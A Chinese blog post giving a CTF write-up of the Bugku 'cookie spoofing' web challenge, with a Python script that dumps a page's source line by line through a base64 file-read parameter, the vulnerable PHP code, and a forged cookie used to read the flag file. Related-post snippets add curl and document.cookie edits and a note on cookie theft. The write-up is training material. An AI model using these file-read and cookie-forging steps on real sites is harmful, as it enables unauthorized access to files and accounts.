CTFweb篇-Cookies欺骗

最新推荐文章于 2025-02-28 15:27:59 发布
最新推荐文章于 2025-02-28 15:27:59 发布
阅读量2.3w 收藏 13
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44597701/article/details/107848246
版权

什么是cookie

其实cookies是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件,它和你的网络浏览行为有关,所以存储在你电脑上的cookies就好像你的一张身份证,你电脑上的cookies和其他电脑上的cookies是不一样的;cookies不能被视作代码执行,也不能成为病毒,所以它对你基本无害。
cookie可以在报文头的前面进行设置。
例题:
在这里插入图片描述

打开是一连串字母,没有用处

于是从URL入手,http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ=

filename是编码了的,一般是base64,解码后是keys.txt

进文件看一看
在这里插入图片描述

又是一串数字,貌似没有用了。好像没有其它方法了。
再看URL,发现有参数line和filename,line可能是行号解析,filename是文件名,改一下行号,改为1
在这里插入图片描述
发现没有现象,猜测可能keys.txt只有一行,而且flag没在这个里面。除了keys.txt外,还有index.php文件,我们把它base64编码后查看一下,其编码为:aW5kZXgucGhw
于是弄一个访问:http://123.206.87.240:8002/web11/index.php?line=0&filename=aW5kZXgucGhw,发现没有输出,可能是php的头行<?php 不能echo导致,将line换为1http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw
在这里插入图片描述
拿到了源码,这样一句一句拿肯定很慢,于是用python的Request进行自动化脚本

import requests
url1 = "http://123.206.87.240:8002/web11/index.php?line="
url2 = "&filename=aW5kZXgucGhw"
mysession = requests.session()
s = ''
for i in range(0, 40):
    r = mysession.get(url1+str(i)+url2)  # 读取每一行代码
    s = s + r.text
print(s)

得到了index.php的源码

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");//重定向到index.php
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

error_reporting(0)是不对php报错
:?是三元运算符
经过分析,只要文件名file为keys.php并且键值对都为margin的cookie就能得到keys.php的内容
这里我们用burpsuite来改包
在这里插入图片描述
在回应中就得到了flag
在这里插入图片描述

总结

cookie可以篡改,要擅于从URL中找到切入点。

【网络安全 | CTF】攻防世界 cookie 解题详析
等风来
05-20 6801
使用Burp Suite抓包可以更全面地查看HTTP响应及其它与网络通信相关的信息,具体操作本文不再赘述。题目描述:X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:这是夹心饼干的意思吗?HTTP响应通常可以在浏览器的开发者工具中找到。根据提示,获取页面Cookie中的数据即可。如图,flag存在于。
BugkuCTF-WEB题cookie欺骗
am_03的博客
08-29 1142
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
ctfshow——Cookie泄露
最新发布
MoSiZh的博客
02-28 207
所以,我们可以通过F12打开控制台,找到存储里的Cookie,然后就会发现有个ctfshow%7Bbd64dae1-4ad7-445d-b74f-27cf0ccc0da1%7D。看到%7B开头,知道这是URL编码,所以我们通过URL解码就可以得到flag 了。本题较为简单,说的是Cookie泄露。
CTF之web——cookie
weixin_61167540的博客
11-23 2011
在cmd中输入:curl -i http://challenge-5460ffbe35aa75a0.sandbox.ctfhub.com:10800/ --cookie "admin=1"这里之所以设置cookie为admin=1,是因为上图中看到网页的请求头里admin=0,也就是设置的不是admin用户去访问的,改成1就好啦。cookie是存储再客户端上的一小段数据,浏览器(即客户端)通过HTTP协议和服务器端进行cookie交互,通常用来存储一些不敏感信息。
Bugku-CTFcookies欺骗
weixin_33842328的博客
04-24 1281
Day22 cookies欺骗 http://123.206.87.240:8002/web11/ 答案格式:KEY{xxxxxxxx} 本题要点:cookie欺骗、base64编码传参 查看源码 什么也没有 看一下url~ 发现base64编码 解一下 观察url ,发现 a2V5cy50eHQ=...
ctf write cookies欺骗
god_001的博客
04-04 2976
题目: 打开网页出现: 发现对line和filename通过get方式传参,其中filename=a2V5cy50eHQ= 猜测是使用了base64加密,解密a2V5cy50eHQ=得到: 可见可以通过filename上传文件,尝试将index.php进行base64加密后(aW5kZXgucGhw)赋值给filename,修改line=3, 访问http://114.67.175.224:14719/index.php?line=3&filename=aW5kZXgucGhw.
BugkuCTF cookies欺骗
3tu6b0rn的博客
05-14 647
页面中乱码 源代码也没有 只有url中有一串类似于base64 说明本网页可能访问的是keys.txt,将filename换为index.phh base64加密aW5kZXgucGhw 改变line即可得到代码 要么写脚本 那么就只能自己一行一行的试了 import requests a=30 for i in range(a): url="http://120.24.86....
CTF-WEB 攻防世界题目实战解析cookie
2301_76565920的博客
04-18 2095
题目:cookie 难度:1
bugku CTF Web-20-cookies欺骗
weixin_47387913的博客
04-14 400
Web-20-cookies欺骗 一、尝试 提交flag的时候又忘记截图了,直接描述一下吧。 给出的网站进入后是一串不知道什么东西的代码,也不像什么加密,直接使用,但是网站进入后网址后面出现了一串编码,base64解密。 发现是读取的keys.txt里面的内容,改变line的值为1或0均相同,改变为2时无内容出现,说明无第二行内容。 直接尝试读取index.php里的内容 与keys.txt相同,把filename改为index.php,同样base64...
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
4. **bugku-ctf 第四题:cookies欺骗** 本题可能涉及对HTTP-only cookies的理解和操作,考生需知道如何伪造、篡改或窃取cookies以获取未经授权的访问权限。 5. **bugku-ctf 第五题:never give up** 可能是一个...
CTF Web学习(三)----python脚本的编写及应用
网络猿的博客
01-10 3000
CTF Web学习(三) python脚本的编写及应用 CTF Web学习目录链接 CTF Web学习(一):基础及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 文章目录CTF Web学习(三)前言一、python编程(一)BugKu web18 秋名山车神(二)BugKu web19 速度要快(三)BugKu web20 cookies欺骗总结 前言 本次学习主要针对python编程。简单得编程。 一、python编程 以下的题都是出自bugku,但是链接不是
BugKuCTF中套路满满的题-------Cookie欺骗
qq_42133828的博客
12-19 2429
这一题,首先看题目,Cookie欺骗,那么什么是Cookie欺骗呢?      看了网上的一些博客后,我想可以总结一句话就是: 你在火狐成功登陆了一个账号,并且把session_id记录下来,转而去其他浏览器登陆此账号,但此时的登陆不需要密码和账号,只需要把Session_id传给服务器,便可成功登陆  好了,话不多说,直接上。。。      首先,界面给出的是一串字符,当我想并没有什么用...
ctf-攻防世界-web:cookie
一只菜鸟的博客
11-01 4495
提示在cookie里放了东西,那么就去查看cookie吧。F12打开开发者工具,在储存里有名为look-here,值为cookie.php的cookie 访问cookie.php,提示See the http response,即查看http返回包。 在开发者工具的网络一栏查看cookie.php,即可发现flag 或者用burp抓包,右键send to repeater 可查看返回包的headers发现flag ...
CTF学习记录006-Cookie欺骗、认证、伪造
wupeng_ccab的博客
09-14 1255
打开页面显示如下:hello guest. only admin can get flag. 意思很明显需要admin身份才可以。相信用Burp抓包改cookie值 是一样的。今后再遇到类似题目,这是思路方向。把cookie中名称为admin的值0改成1,然后重新加载页面,显示flag。打开页面后,使用浏览器F12开发者工具,找到cookie。题目:Cookie欺骗、认证、伪造。
安全 ctf-Web基础_cookie欺骗
weixin_63274653的博客
01-22 1246
1. 打开题目给的链接,显示:hello guest. only admin can get flag.document.cookie = 'admin = 1' #将admin的值修改为1。document.cookie #查看cookieCookie欺骗、认证、伪造。3. 然后按F5刷新界面,获得flag。
CTF-web题· cookie
2302_80276789的博客
07-21 431
在右上角上会看到url上有cookie的字样,因此可以判断出来这题使用了cookie,按下F12,找到储存,会看到一个cookie栏目。会发现hint值有一个fl4g.txt很像flag,或者如果我们没有关闭burp,那么我们就可以看到。这其实就是flag的变形,那么,我们就可以对他进行访问。打开题目之后会发现如下界面。然后就会得到flag。
CTF__(1)web之Cookie
weixin_30618985的博客
11-26 326
Cookie在英文中是小甜品的意思,而这个词我们总能在浏览器中看到,食品怎么会跟浏览器扯上关系呢?在你浏览以前登陆过的网站时可能会在网页中出现:你好XX,感觉很亲切,就好像是吃了一个小甜品一样。这其实是通过访问你主机里边的一个文件来实现的,因此这个文件也就被称为了Cookie。想全面了解Cookie吗?看看下文吧!   一.了解Cookie 适用对象:初级读者   Cookie是当你浏览...
CTFHUB-WEB前置技能-HTTP协议-Cookie
K_ShenH的博客
06-09 976
CTFHUB-WEB前置技能-HTTP协议-Cookie
CTF练习题[WEB]-cookies
weixin_45246254的博客
02-10 2864
https://ctf.bugku.com/challenges/detail/id/87.html 拿到题目如下,提示:Cookies欺骗 访问跳转到以下地址 http://114.67.175.224:15773/index.php?line=&filename=a2V5cy50eHQ= filename看起来就是base64,拿去解码 扫目录没有发现其他可疑文件 推测攻破点就在这个filename这里了,另外还有个line变量 先把line拿去遍历,没有发现什么 已知的还有一个文件就是
cookie欺骗bugkuctf
02-26
### 关于Cookie欺骗漏洞及其解决方案 #### Cookie欺骗概述 Cookie欺骗是指攻击者通过各种手段获取用户的敏感Cookie信息,并利用这些信息冒充合法用户访问受保护的Web应用。当COOKIE的HTTPOnly flag没有设置时,对于很多只依赖于cookie验证的网站来说存在较大风险[^1]。 #### CTF比赛中常见场景 在CTF竞赛环境中,参赛队伍可能会遇到涉及Cookie管理不当的应用程序。这类题目通常考察选手对Web安全的理解程度以及如何有效防护此类威胁的能力。例如,在某些情况下,如果开发者未能正确配置HttpOnly属性,则可能导致JavaScript能够读取并操控Cookies,从而被用来实施跨站脚本攻击(XSS),进而窃取会话令牌等重要数据[^2]。 #### 防护措施建议 为了防止Cookie欺骗的发生,应采取以下几种方法: - **启用 HttpOnly 属性**:确保所有的身份认证相关的 Cookies都设置了`HttpOnly`标志位,使得客户端脚本无法访问它们。 ```http Set-Cookie: sessionId=abcde; Path=/; Secure; HttpOnly; ``` - **采用 HTTPS 进行传输加密**:强制使用SSL/TLS连接来保障通信过程中的安全性,避免中间人劫持或篡改请求响应报文中携带的信息。 - **定期更新和轮转密钥材料**:缩短Session有效期的同时引入更复杂的随机数生成算法,增加破解难度。 - **实现严格的同源策略控制**:限制第三方站点加载资源或者发起跨域请求的可能性,减少潜在的风险暴露面。 #### 实战演练案例分析 假设在一个模拟环境下的CTF挑战里,给定了一款在线商城平台作为靶场对象。经过初步侦查发现该系统的登录接口存在明显的缺陷——即未开启上述提到的关键选项之一。此时可以通过构造恶意链接诱导受害者点击触发XSS事件,最终成功捕获到对方浏览器内的真实凭证。然而这只是第一步;后续还需要进一步挖掘其他逻辑错误点才能完成整个攻防流程的设计思路转换。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值